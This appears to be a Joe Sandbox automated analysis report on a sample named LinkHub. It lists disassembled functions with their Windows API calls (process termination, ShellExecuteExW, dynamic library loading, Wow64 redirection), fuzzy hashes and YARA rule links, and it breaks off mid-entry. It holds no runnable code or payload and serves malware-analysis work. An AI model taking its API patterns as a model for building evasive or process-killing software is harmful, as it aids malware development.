Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: fafcf58869b97cb9a04547a834e5d6e4e3e3223f5df8eedbcb397371b293514f
Instruction ID: 3d062bf40e9367438299fe43de22d4eeab55a19b4048064b095ffd00189f22f4
Opcode Fuzzy Hash: fafcf58869b97cb9a04547a834e5d6e4e3e3223f5df8eedbcb397371b293514f
Instruction Fuzzy Hash: 73F04276A4A5006BC2113736BC0AA5F16DD9FC9775F212519FB14F22E2EF708EC64161

Function 00E69480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00DD1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DD1F87
Part of subcall function 00DD1F2D: SelectObject.GDI32(?,00000000), ref: 00DD1F96
Part of subcall function 00DD1F2D: BeginPath.GDI32(?), ref: 00DD1FAD
Part of subcall function 00DD1F2D: SelectObject.GDI32(?,00000000), ref: 00DD1FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E694AA
LineTo.GDI32(?,00000003,00000000), ref: 00E694BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E694CC
LineTo.GDI32(?,00000000,00000003), ref: 00E694DC
EndPath.GDI32(?), ref: 00E694EC
StrokePath.GDI32(?), ref: 00E694FC

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: cb64dc922086c0fdbf7ee8dcf05139697896f690ad2964815d7ed491bb8b33d1
Instruction ID: 50eea1e207b8562ad6a8499032ca47d238036303bbbfab4050b31834c3d8ed4c
Opcode Fuzzy Hash: cb64dc922086c0fdbf7ee8dcf05139697896f690ad2964815d7ed491bb8b33d1
Instruction Fuzzy Hash: 77111B7650410DBFDF029F95EC88E9B7F6DEF083A4F008011FA196A161C7B1AD59DBA0

Function 00E35B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E35B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00E35B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E35B94
ReleaseDC.USER32(00000000,00000000), ref: 00E35B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E35BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00E35BC5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3860327d44dcf51ae2572985963fa39fe35acdf1cff3f7431a3453937394b387
Instruction ID: deb711c0992770c45b02c67130ec2aa67e25a46c1219bb67d63dc1faf6259b63
Opcode Fuzzy Hash: 3860327d44dcf51ae2572985963fa39fe35acdf1cff3f7431a3453937394b387
Instruction Fuzzy Hash: 17012175E04718BBEB109BA69C49E4EBFA8EB48751F004065EA05B7280D6B09804CF91

Function 00DD327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DD32AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 00DD32B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DD32C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DD32CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 00DD32D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00DD32DD

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 40826b2da3ad16651fca10cb51c930b75325c3d18d18c8dbdc87a69797deddd2
Instruction ID: 6c89328857eec064fbbecaed6b3003d9e779fcc80bba74f31c09e47f3f684de6
Opcode Fuzzy Hash: 40826b2da3ad16651fca10cb51c930b75325c3d18d18c8dbdc87a69797deddd2
Instruction Fuzzy Hash: 280148B090175A7DE3008F5A8C85A56FFA8FF19354F00411BD15C4B941C7F5A864CBE5

Function 00E3F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E3F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E3F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00E3F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E3F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E3F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E3F48C

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cfc089fcad9759ac5d8fc2f23c0d15d53b69f5c15eef5bf022a0f71f48d87217
Instruction ID: 02103b2a4e9a0ec4dbc685e162e91721656facbb09fcf3ce95df7c2205d2527c
Opcode Fuzzy Hash: cfc089fcad9759ac5d8fc2f23c0d15d53b69f5c15eef5bf022a0f71f48d87217
Instruction Fuzzy Hash: C4F06D32B45158BFE7205753AC0EEEF3E7CEBCAB51F400018F611E109096E02A05C6B6

Function 00E134D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00E134EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00E13506
GetWindowDC.USER32(?), ref: 00E13512
GetPixel.GDI32(00000000,?,?), ref: 00E13521
ReleaseDC.USER32(?,00000000), ref: 00E13533
GetSysColor.USER32(00000005), ref: 00E1354D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: b1d694edf521c1dc13f5d6e82827bc9d67b5862e501ab8749a75665c6586a9d7
Instruction ID: 725bca102a8f2646d4a511c89d60f70c9e8440f1261672a44cf1fd1dc23d26cd
Opcode Fuzzy Hash: b1d694edf521c1dc13f5d6e82827bc9d67b5862e501ab8749a75665c6586a9d7
Instruction Fuzzy Hash: 6C018F31A04105EFDB115F65EC08BEA7BB2FB08750F900120F916B21A0CB711E859B51

Function 00E321C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E321CC
UnloadUserProfile.USERENV(?,?), ref: 00E321D8
CloseHandle.KERNEL32(?), ref: 00E321E1
CloseHandle.KERNEL32(?), ref: 00E321E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00E321F2
HeapFree.KERNEL32(00000000), ref: 00E321F9

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6adf0cad41a0a32caf19188c81b1c25b91bae6c4539085542574043c0da56826
Instruction ID: d5d4ee7e37123c980e68a8307eac109534f569281430ff5325803459b4e8db22
Opcode Fuzzy Hash: 6adf0cad41a0a32caf19188c81b1c25b91bae6c4539085542574043c0da56826
Instruction Fuzzy Hash: E2E0C276608145BFDB011BA3FC0C90ABF29FB4A3A2B904221F225E2170CBB2A424DB51

Function 00E5B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00E5B903

Part of subcall function 00DD41EA: _wcslen.LIBCMT ref: 00DD41EF

GetProcessId.KERNEL32(00000000), ref: 00E5B998
CloseHandle.KERNEL32(00000000), ref: 00E5B9C7

Strings

@, xrefs: 00E5B8D2
<, xrefs: 00E5B8CB

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: ccfcfe54c79a8b49f2a93d5686645fb09d4975d143e3123cad72136490791da6
Instruction ID: 561f0bdb9e577068089f3e72d1e7c25c0492a22080e2798a5d695cfbd7468fc3
Opcode Fuzzy Hash: ccfcfe54c79a8b49f2a93d5686645fb09d4975d143e3123cad72136490791da6
Instruction Fuzzy Hash: C9716974A00219DFCB14EF54C895A9EBBF4FF08314F04889AE855AB352CB71ED49CBA0

Function 00E64818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E648D1
IsMenu.USER32(?), ref: 00E648E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E6492E
DrawMenuBar.USER32 ref: 00E64941

Strings

0, xrefs: 00E64825

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 961261e19ac986f934f1bc26480426708df96e4edc7209f1b19a2c0117fcc281
Instruction ID: faf44d620e8639ef200ce3595cf7912ff41eeaf3e39bc1fa42905b310ee88b92
Opcode Fuzzy Hash: 961261e19ac986f934f1bc26480426708df96e4edc7209f1b19a2c0117fcc281
Instruction Fuzzy Hash: 0C414CB5A4024AEFDB10CF55E884AAABBB5FF463A8F045119F955A7390C730AD44CB60

Function 00E3272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDB329: _wcslen.LIBCMT ref: 00DDB333

Part of subcall function 00E345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E34620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E327B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E327C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00E327F6

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

Strings

ComboBox, xrefs: 00E3273D
ListBox, xrefs: 00E32772

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 861628ca5f90fadcff35fb1c8456e28cb1583618bb869b427d1e548c73992f0e
Instruction ID: 73a05b8b497f886bd86792c591ef3444c35e2edeb8365db0671bb3bc2b26c9c3
Opcode Fuzzy Hash: 861628ca5f90fadcff35fb1c8456e28cb1583618bb869b427d1e548c73992f0e
Instruction Fuzzy Hash: AB210471E00204BEDB09AB64DC49DFE7BB8DF453A4F10512AF551B32E1DB745909D670

Function 00E639B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E63A29
LoadLibraryW.KERNEL32(?), ref: 00E63A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E63A45
DestroyWindow.USER32(?), ref: 00E63A4D

Strings

SysAnimate32, xrefs: 00E63A04

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 9f9b1dd89f10b4aa0d1505c73e517672f6589169b6ee5cc0cd0991ed1be743b3
Instruction ID: 347e3eaa8302d406b09159c349472b7d5023314a2bf038304583ad371b682247
Opcode Fuzzy Hash: 9f9b1dd89f10b4aa0d1505c73e517672f6589169b6ee5cc0cd0991ed1be743b3
Instruction Fuzzy Hash: 2321A171640205AFEF108FB4EC80FBB77E9EB853A8F106219FA91B2191D771DD40A760

Function 00E69A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

GetCursorPos.USER32(?), ref: 00E69A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E69A72
GetCursorPos.USER32(?), ref: 00E69ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00E69AF0

Strings

(, xrefs: 00E69A30

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (
API String ID: 2864067406-2063206799
Opcode ID: a76b5f43b2cf3cfa8d033526b40f8a85b102d581a3d3e056d3d32b12ac6bf460
Instruction ID: 867de090538b4e4e8d7bdfd507186abfc37236e1a36dd6fc3c2fe68a8114f59e
Opcode Fuzzy Hash: a76b5f43b2cf3cfa8d033526b40f8a85b102d581a3d3e056d3d32b12ac6bf460
Instruction Fuzzy Hash: 5021AD34600018EFCF258F99E848EFA7FB9EB4A790F404159FA056B2A2D3709954DB60

Function 00DD1AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00DD1AF4
GetClientRect.USER32(?,?), ref: 00E131F9
GetCursorPos.USER32(?), ref: 00E13203
ScreenToClient.USER32(?,?), ref: 00E1320E

Strings

(, xrefs: 00DD1AB2

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (
API String ID: 4127811313-2063206799
Opcode ID: 75edec82da95dd15e2489a761aeec18cff86607652adb5c2cbf08bac93745e3b
Instruction ID: 4abd92bdbdb30c2f327b68d529de12ca92a81cd2f3e9d0ec3c1a10ac03de5e57
Opcode Fuzzy Hash: 75edec82da95dd15e2489a761aeec18cff86607652adb5c2cbf08bac93745e3b
Instruction Fuzzy Hash: 7B112835A01119BFCB009FA8D9459EE7BB8FB45394F501456E912F2240C771BA96CBB1

Function 00DF50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DF508E,00000003,?,00DF502E,00000003,00E998D8,0000000C,00DF5185,00000003,00000002), ref: 00DF50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DF5110
FreeLibrary.KERNEL32(00000000,?,?,?,00DF508E,00000003,?,00DF502E,00000003,00E998D8,0000000C,00DF5185,00000003,00000002,00000000), ref: 00DF5133

Strings

CorExitProcess, xrefs: 00DF5108
mscoree.dll, xrefs: 00DF50F6

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3cae9d9530b60b15e80005d2139f97b858f8af79c8a304f8b431470cb39ca44b
Instruction ID: b9e2a13acdc57260ad9fd5cc95fbc1b80721dfb6cb061f41a76db0c46f51c45d
Opcode Fuzzy Hash: 3cae9d9530b60b15e80005d2139f97b858f8af79c8a304f8b431470cb39ca44b
Instruction Fuzzy Hash: A0F0A430A0430CBFDB149F99EC09BAEBFB4EF09752F454065F909B6160DBB05944CAA0

Function 00E2E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00E2E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E2E797
FreeLibrary.KERNEL32(00000000), ref: 00E2E7BD

Strings

GetSystemWow64DirectoryW, xrefs: 00E2E791
X64, xrefs: 00E2E680

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 78cc9258bbd19ce662df73f00399a18b2eeafd418112e118002efd9c97bcdd3a
Instruction ID: 5a87cc40c696377ecf402698763236c0ab83c5584cdbdb4f1cf623373c9f5c85
Opcode Fuzzy Hash: 78cc9258bbd19ce662df73f00399a18b2eeafd418112e118002efd9c97bcdd3a
Instruction Fuzzy Hash: 3CE02BB1D076719FEB7167216C44EAA72146F12B44B101559F801F6350DBB4CD8C8A94

Function 00DD663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DD668B,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DD665C
FreeLibrary.KERNEL32(00000000,?,?,00DD668B,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD666E

Strings

kernel32.dll, xrefs: 00DD6642
Wow64DisableWow64FsRedirection, xrefs: 00DD6656

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: ba4fbff09a8a0fe325ccc24a7629cdb1843132952da6a05a7e13744146c8f9bb
Instruction ID: dcf5e2e1a6a51f43b25acd6be81fc633945654d60cf23c86da81e6698a5eb585
Opcode Fuzzy Hash: ba4fbff09a8a0fe325ccc24a7629cdb1843132952da6a05a7e13744146c8f9bb
Instruction Fuzzy Hash: 6FE08635B066221B93111726BC08A9B65289F93B56B4D0156F900F2344DBD0CC0580F4

Function 00DD6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E15657,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD6610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DD6622
FreeLibrary.KERNEL32(00000000,?,?,00E15657,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD6635

Strings

Wow64RevertWow64FsRedirection, xrefs: 00DD661C
kernel32.dll, xrefs: 00DD6609

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
